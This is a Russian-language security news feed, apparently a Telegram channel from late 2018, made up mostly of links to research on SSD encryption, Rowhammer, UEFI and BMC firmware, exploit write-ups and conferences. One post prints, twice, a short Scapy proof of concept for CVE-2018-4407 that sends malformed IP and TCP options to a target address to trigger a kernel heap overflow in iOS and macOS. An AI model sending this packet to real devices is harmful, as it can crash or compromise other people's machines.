Хорошая книга "Mathematics of Public Key Cryptography" по основам крипторафии с открытым ключем доступна в общем доступе по желанию автора https://www.math.auckland.ac.nz/~sgal018/crypto-book/crypto-book.html
Интересное видео доклада «Effective Memory Safety Mitigations» от Криса Рольфа https://www.youtube.com/watch?v=Q379iWqmodM
YouTube
Qualcomm 2018 Security Summit
Effective memory safety mitigations - Chris Rohlf, Square. Memory Safety mitigations are an important tool for reducing attack reliability and raising exploit development costs. We have all invested a great deal of time and effort into tools, libraries, sandboxes…
iOS 12 / OS X Remote Kernel Heap Overflow (CVE-2018-4407) POC в несколько строк:
pip install scapy
sudo scapy
send(IP(dst=“Target IP“,options=[IPOption(“A”*8)])/TCP(dport=2323,options=[(19, “1"*18),(19, “2”*18)]))
pip install scapy
sudo scapy
send(IP(dst=“Target IP“,options=[IPOption(“A”*8)])/TCP(dport=2323,options=[(19, “1"*18),(19, “2”*18)]))
Любопытный доклад "Smartphone Privacy: How Your Smartphone Tracks Your Entire Life" на тему смартфонов и прайваси. В современном мире пользователь все чаще сам становится продуктом для корпораций, а точнее источником данных. Прежде чем подключаться к очередному бесплатному сервису задумайтесь, что движет компанией, которая его производит? Бесплатного ничего в этом мире нет и компаний альтруистов не существует даже в благотворительности! https://conference.hitb.org/hitbsecconf2018pek/materials/D2T2%20-%20How%20Your%20Smartphone%20Tracks%20Your%20Entire%20Life%20-%20Vladimir%20Katalov.pdf
Интересные новости сегодня вокруг безопасности жестких дисков и технологий полно дискового шифрования. В исследовании "Self-encrypting deception: weaknesses in the encryption of solid state drives (SSDs)" обсуждается технология TCG Opal, которую по большей части разработал Intel и внедрил в качестве "безопасного" прокси-интерфейса во всех современных прошивках BIOS. Так вот, к примеру MS Win10 и технология Bitlocker не использует дополнительного шифрования на современных SSD, а только интегрируется со встроенной TCG Opal, что при указанных в исследовании уязвимостях создает возможность для атаки на пароль доступа к жесткому диску. Так же в исследовании говорится о уязвимостях непосредственно в прошивках SSD дисков от Crucial и Samsung, которые при наличие физического доступа позволяют при помощи отладочных интерфейсов успешно обойти часть проверок безопасности. Эти новости все больше наводят на мысли о том, что разработчик ОС должен контролировать полностью и железо, так как без этого всегда найдется уязвимое звено именно там.
https://www.ru.nl/publish/pages/909275/draft-paper_1.pdf
https://link.medium.com/ELPjoikaCR
https://www.theregister.co.uk/2018/11/05/busted_ssd_encryption/
https://www.ru.nl/publish/pages/909275/draft-paper_1.pdf
https://link.medium.com/ELPjoikaCR
https://www.theregister.co.uk/2018/11/05/busted_ssd_encryption/
Forwarded from Хакер — Xakep.RU
Пятнадцатая встреча DEFCON Moscow состоится 10 и 11 ноября. Приходи!
15-я встреча DEFCON Moscow пройдет 10 ноября в конгресс-центре МТУСИ с основным треком в главном зале на 30–40 минут и залом поменьше, обозначенным как «давай сделаем это по-быстрому» на 15–20 минут :). Приходи, будет интересно, проведи выходной в сообществе с пользой для головы и рук. Вход бесплатный!
https://xakep.ru/2018/11/07/dc7499/
15-я встреча DEFCON Moscow пройдет 10 ноября в конгресс-центре МТУСИ с основным треком в главном зале на 30–40 минут и залом поменьше, обозначенным как «давай сделаем это по-быстрому» на 15–20 минут :). Приходи, будет интересно, проведи выходной в сообществе с пользой для головы и рук. Вход бесплатный!
https://xakep.ru/2018/11/07/dc7499/
Forwarded from ZeroNights
🔥НОВОСТЬ-ОГОНЬ🔥Финальная программа ZeroNights 2018 — для вас!
Покупайте билеты, берите друзей и приезжайте 20 ноября в самый красивый город России — Санкт-Петербург!
Обещаем хардовые доклады, крутую вечеринку и бесконечный нетворкинг. А еще кикер.
До встречи: https://2018.zeronights.ru/program/.
Покупайте билеты, берите друзей и приезжайте 20 ноября в самый красивый город России — Санкт-Петербург!
Обещаем хардовые доклады, крутую вечеринку и бесконечный нетворкинг. А еще кикер.
До встречи: https://2018.zeronights.ru/program/.
Сегодня Samuel Groß зарелизил свою зксплойт связку (Safari + macOS), которую он использовал для победы в конкурсе Pwn2Own 2018 в начале этого года. Отличное пошаговое описание и код для всей цепочки эксплойтов.
stage0: WebKit exploit
stage1: first stage payload
stage2: payload sandbox escape
stage3: coordinate the remaining stages
stage4: LPE to gain root
stage5: LPE to gain kernel code execution
https://github.com/saelo/pwn2own2018
stage0: WebKit exploit
stage1: first stage payload
stage2: payload sandbox escape
stage3: coordinate the remaining stages
stage4: LPE to gain root
stage5: LPE to gain kernel code execution
https://github.com/saelo/pwn2own2018
GitHub
GitHub - saelo/pwn2own2018: A Pwn2Own exploit chain
A Pwn2Own exploit chain. Contribute to saelo/pwn2own2018 development by creating an account on GitHub.
Что мотивирует исследователей разглашать уязвимости без патчей в Full Disclosure? Причин может быть масса, это и нерасторопность вендоров в выпуске патчей, и отсутствие bug bounty или же просто стремление сделать мир лучше без ожидания возможности опубликовать свой ресеч после патча.
На днях исследователь @MorteNoir опубликовал отличный детальный блог "Full disclosure: 0day-уязвимость побега из VirtualBox", где рассказал о интересном векторе эксплуатации виртуального устройства сетевой карты, который приводит к побегу из guest виртуальной машины в host ОС.
https://habr.com/post/429004/
На днях исследователь @MorteNoir опубликовал отличный детальный блог "Full disclosure: 0day-уязвимость побега из VirtualBox", где рассказал о интересном векторе эксплуатации виртуального устройства сетевой карты, который приводит к побегу из guest виртуальной машины в host ОС.
https://habr.com/post/429004/
Богата эта неделя на отличные описания уязвимостей вот вам еще один (CVE-2018-4331) на который стоит обратить внимание "An introduction to exploiting userspace race conditions on iOS" https://bazad.github.io/2018/11/introduction-userspace-race-conditions-ios/
bazad.github.io
An introduction to exploiting userspace race conditions on iOS | bazad.github.io
XPC service vulnerabilities are a convenient way to elevate privileges and/or evade the sandbox. This post will look at a race condition in GSSCred on macOS ...
А вот вам реальный пример атаки BadUSB через зарядку для iPhone на Macbook Air 😈
Видео всех докладов конференции Black Hat Vegas 2018 доступны онлайн! https://youtube.com/playlist?list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe
YouTube
Black Hat USA 2018
Black Hat USA 2018 took place August 4-9, 2018 at Mandalay Bay in Las Vegas. Find full abstracts and presentation materials here: https://www.blackhat.com/us...
Хотите понять в деталях, как устроено E2E шифрование в Signal, смотрите это видео https://www.youtube.com/watch?v=DXv1boalsDI
YouTube
How Signal Instant Messaging Protocol Works (& WhatsApp etc) - Computerphile
How do instant message apps do end to end encryption when one phone may not even be switched on yet? Dr Mike Pound on the Signal protocol at the core of most messaging apps.
Double Ratchet: COMING SOON!
https://www.facebook.com/computerphile
https://tw…
Double Ratchet: COMING SOON!
https://www.facebook.com/computerphile
https://tw…
Интересную мысль на днях высказал известный эксперт Брюс Шнайер. Она заключается в том, что становится все больше софта, который не так-то просто пропатчить. Мы уже привыкли к парадигме быстрой разработки и бесконечного цикла улучшения софта посредством доставки обновлений. Но вдумайтесь в современном мире становится все больше софта, куда доставка обновлений является проблемой. Например, самолеты, автомобили, критическая инфраструктура, промышленное оборудование, кардио стимуляторы и куча всего остального в том же духе. В большинстве случаев мы просто не обновляем подобного рода софт, но ведь баги от этого живут там годами. Отличным примером послужили недавние массовые эпидемии WannaCry по всему миру. Все это наводит на интересные мысли, о том что текущие парадигмы разработки софта требуют пересмотра, по крайней мере в некоторых её областях 😈 https://motherboard.vice.com/amp/en_us/article/439wbw/patching-is-failing-as-a-security-paradigm?__twitter_impression=true
Vice
Patching Is Failing as a Security Paradigm
Many of the most damaging hacks in recent history were only possible because someone failed to update software.
Интересный доклад ”Studying Silicon: Reverse Engineering Integrated Circuits” на тему обратного анализа микропроцессоров и печатных плат https://www.youtube.com/watch?v=TKi1xX7KKOI
YouTube
Hackaday Supercon - Ken Shirriff : Studying Silicon: Reverse Engineering Integrated Circuits
From the outside, integrated circuits are mysterious black boxes. Here’s how to open up some famous analog and digital chips including 8008 microprocessor, 555 timer, the first FPGA chip, Intel’s first RAM, the 76477 sound effects chip, and a counterfeit…
Интересное исследование "Secure Boot in the Era of the T2" опубликовало сегодня Duo Labs. Не так давно компания Apple обновила линейку MacBook Pro и MacBook Air, где одним из основных изменений послужило повсеместное использование, в качестве корня доверия, специального процессора T2 отвечающего за безопасность. Так вот исследователи из Duo Labs посмотрели на основные извинения с точки зрения реализации нового Secure Boot с участием T2 и изменения на стороне BIOS https://duo.com/blog/secure-boot-in-the-era-of-the-t2
Duo Security
Secure Boot in the Era of the T2
Today, the Duo Labs team is releasing an in-depth look at Apple’s new approach to secure boot as described in Apple’s T2 Security Chip Overview.
Все, наверное, помнят нашумевшую атаку Rowhammer на DRAM память, которая была представлена в 2014 году. После этого исследователи продемонстрировали множество вариаций этой атаки, но большинство вендоров памяти сошлось во мнении что память, использующая ECC (Error-Correcting Code) не подвержена этой атаке. Так вот сегодня исследователи из VUSec опубликовали еще одно исследование, где продемонстрировали успешную атаку на DRAM память с использованием ECC. В основе атаки ECCploit лежит концепция bitflip не с одним битом, как это было продемонстрировано ранее, а сразу с тремя, что позволяет обойти коррекцию ошибок https://www.vusec.net/projects/eccploit/
vusec
ECCploit: ECC Memory Vulnerable to Rowhammer Attacks After All - vusec
How well does ECC protects against Rowhammer? Exploiting Correcting Codes: On the Effectivenessof ECC Memory Against Rowhammer Attacks.
Всем, кто интересуется безопасностью UEFI прошивок крайне рекомендую обратить внимание на следующие доклады с прошедшей в начале этой неделе конференции ZeroNights:
- "NUClear explotion" - атака на механизмы доставки обновлений (CVE-2018-12176, CVE-2018-12158), а также новый способ обхода технологии Intel Boot Guard bypass (CVE-2018-3623) https://embedi.com/event/nuclear-explotion/
- "Turning your BMC into a revolving door" - любопытный доклад от наших французских коллег, которые продемонстрировали успешную атаку на BMC прошивку от HP их real-time ОС iLO последней версии. Если первый доклад больше сфокусирован на атаку desktop машин, то этот доклад полностью направлен на атаку серверов, что встречается гораздо реже https://airbus-seclab.github.io/ilo/ZERONIGHTS2018-Slides-EN-Turning_your_BMC_into_a_revolving_door-perigaud-gazet-czarny.pdf
- "NUClear explotion" - атака на механизмы доставки обновлений (CVE-2018-12176, CVE-2018-12158), а также новый способ обхода технологии Intel Boot Guard bypass (CVE-2018-3623) https://embedi.com/event/nuclear-explotion/
- "Turning your BMC into a revolving door" - любопытный доклад от наших французских коллег, которые продемонстрировали успешную атаку на BMC прошивку от HP их real-time ОС iLO последней версии. Если первый доклад больше сфокусирован на атаку desktop машин, то этот доклад полностью направлен на атаку серверов, что встречается гораздо реже https://airbus-seclab.github.io/ilo/ZERONIGHTS2018-Slides-EN-Turning_your_BMC_into_a_revolving_door-perigaud-gazet-czarny.pdf
Опубликованы слайды докладов конференции Power of Community (PoC), которая прошла в Сеуле http://powerofcommunity.net/2018.htm
powerofcommunity.net
Power of Community
Welcome to the home of POC. POC started in 2006 and has been organized by Korean hackers & security experts. It is an international security & hacking conference in Korea. POC doesn't pursue money. POC concentrates on technical and creative discussion and…